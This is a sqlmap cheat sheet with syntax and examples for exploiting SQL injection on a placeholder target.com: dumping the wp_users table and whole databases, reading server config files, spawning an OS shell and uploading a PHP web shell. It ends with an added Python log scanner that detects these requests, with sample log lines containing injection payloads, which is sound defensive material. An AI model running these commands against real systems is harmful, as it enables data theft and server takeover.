SqlMap Cheatsheet


sqlmap is an amazing and super useful penetration testing tool that automates the process of detecting and exploiting SQL injection.

Get DBMS banner

Syntax:

sqlmap <url> -p <parameter_vulnerable> -b

Example:

sqlmap http://target.com/vulnerable.php?id=123 -p id -b

Get the current database name

Syntax:

sqlmap <url> -p <parameter_vulnerable> --current-db

Example:

sqlmap http://target.com/vulnerable.php?id=123 -p id --current-db

Get current username

Syntax:

sqlmap <url> -p <parameter_vulnerable> --current-user

Example:

sqlmap http://target.com/vulnerable.php?id=123 -p id --current-user

Get the list of tables in a database

Syntax:

sqlmap <url> -p <parameter_vulnerable> -D <database_name> --tables

Example:

sqlmap http://target.com/vulnerable.php?id=123 -p id -D wordpress_db --tables

Get the list of columns in a table

Syntax:

sqlmap <url> -p <parameter_vulnerable> -D <database_name> -T <table_name> --columns

Example:

sqlmap http://target.com/vulnerable.php?id=123 -p id -D wordpress_db -T wp_users --columns

Dump table information

Syntax:

sqlmap <url> -p <parameter_vulnerable> -D <database_name> -T <table_name> --dump

Example:

sqlmap http://target.com/vulnerable.php?id=123 -p id -D wordpress_db -T wp_users --dump

Dump ALL database information

Syntax:

sqlmap <url> -p <parameter_vulnerable> -D <database_name> --dump-all

Example:

sqlmap http://target.com/vulnerable.php?id=123 -p id -D wordpress_db --dump-all

Spawn a Shell

For this you need to know a writable directory on the server, for example /var/www/html/uploads/

Syntax:

sqlmap <url> -p <parameter_vulnerable> -D <database_name> --os-shell

Example:

sqlmap http://target.com/vulnerable.php?id=123 -p id -D wordpress_db --os-shell

Uploading a shell

For this you need to know a writable directory on the server, for example /var/www/html/uploads/

Syntax:

sqlmap <url> --file-dest="<remoteFilePath>" --file-write="<yourLocalFile.php>"

Example:

sqlmap http://target.com/vulnerable.php?id=123 -p id --file-dest="/var/www/uploads/shell.php" --file-write="/tmp/myshell.php"

Executing a Query

Syntax:

sqlmap <url> -p <parameter_vulnerable> -D <databaseName> --sql-query <sql_sentence>

Example:

sqlmap http://target.com/vulnerable.php?id=123 -p id -D wordpress_db --sql-query "Select * from wp_users;"

Downloading files from the server

Note: for this you need to know the file structure of the server.

Syntax:

sqlmap <url> -p <parameter_vulnerable> -D <databaseName> --file-read=<PathFile>

Example:

sqlmap http://target.com/vulnerable.php?id=123 -p id -D wordpress_db --file-read=/var/www/html/dbConfig.php

Specify the vulnerable parameter in the URL

Syntax:

The asterisk symbol (*) is used to specify the vulnerable parameter.

sqlmap --url https://target.com/articles/*vulnerable-param

Docker Version

1.- Pull the image from Docker Hub

docker pull paoloo/sqlmap

2.- Create a directory for the volume (results will be saved in this directory)

mkdir /tmp/sqlmap

3.- Run the image in a temporary container

docker run --rm -it -v /tmp/sqlmap:/root/.sqlmap/ paoloo/sqlmap --url https://target.com/articles.php?id=1 -p id
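
A defender's view of the requests the commands above generate, as an added example that is not part of the original cheat sheet: a scanner for web access logs that flags clients whose `id` value on the example `vulnerable.php` endpoint is not a plain integer, or that send sqlmap's default User-Agent. The log lines, IP addresses, version string and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache/nginx "combined" format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "GET /vulnerable.php?id=123 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Mar/2024:10:00:02 +0000] "GET /vulnerable.php?id=123 HTTP/1.1" 200 512 "-" "sqlmap/1.8#stable (https://sqlmap.org)"
198.51.100.9 - - [10/Mar/2024:10:00:03 +0000] "GET /vulnerable.php?id=123%20AND%205=5 HTTP/1.1" 200 512 "-" "sqlmap/1.8#stable (https://sqlmap.org)"
192.0.2.44 - - [10/Mar/2024:10:00:04 +0000] "GET /vulnerable.php?id=123%27%20OR%20%271%27=%271 HTTP/1.1" 500 90 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:10:00:05 +0000] "GET /index.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# client, ident, user, [time], "METHOD target PROTO", status, size, "referer", "user-agent"
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# sqlmap's default User-Agent; the header is client-controlled, so it is a weak signal.
SQLMAP_UA = re.compile(r"\bsqlmap/\d", re.I)
# What the application expects in the parameter: a short decimal integer.
INT_RE = re.compile(r"[0-9]{1,10}")


def scan(log_text, path="/vulnerable.php", param="id"):
    """Return {client_ip: sorted list of reasons} for suspicious requests."""
    findings = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        if SQLMAP_UA.search(m["ua"]):
            findings[m["ip"]].add("sqlmap-user-agent")
        url = urlsplit(m["target"])
        if url.path != path:
            continue
        # parse_qs URL-decodes the value, so encoded payloads are checked in clear.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if not INT_RE.fullmatch(value):
                findings[m["ip"]].add("non-integer-" + param)
    return {ip: sorted(reasons) for ip, reasons in findings.items()}


if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG).items():
        print(ip, ", ".join(reasons))
```

The same integer check, applied in the application before the query is built (together with a parameterized query), is what removes the injection point these log entries reveal.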